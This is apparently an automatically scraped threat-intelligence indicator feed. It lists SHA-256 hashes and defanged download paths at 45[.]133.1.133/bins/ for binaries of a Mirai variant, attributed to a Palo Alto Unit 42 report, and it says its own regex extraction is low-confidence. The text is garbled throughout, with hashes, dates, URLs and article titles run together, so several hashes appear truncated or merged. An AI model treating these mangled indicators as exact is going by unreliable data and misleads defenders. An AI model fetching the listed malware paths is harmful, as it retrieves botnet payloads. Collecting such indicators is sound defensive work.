sha2561d9496814d35d9e302d7e99339e9730fc81c022bc085c0711b73ebad962cbc2b2f4420a Mar 3, 2021 14:24 UTC 45[.]133.1.133/bins/dark.mpsl 1d9496814d35d9e302d7e99339e9730fc81c022bc085c0711b73ebad962cbc2b Mar 3, 2021 14:24 UTC 45[.]133.1.133/bins/dark.ppc 971b5a96New Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
sha2561e56f8ca44f84eff212805fa061ecb0f6fb8bc9499ff2e541ad3c43fb2f4420a54d23ba Mar 3, 2021 14:24 UTC 45[.]133.1.133/bins/dark.mips 1e56f8ca44f84eff212805fa061ecb0f6fb8bc9499ff2e541ad3c43fb2f4420a Mar 3, 2021 14:24 UTC 45[.]133.1.133/bins/dark.mpsl 1d94968New Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.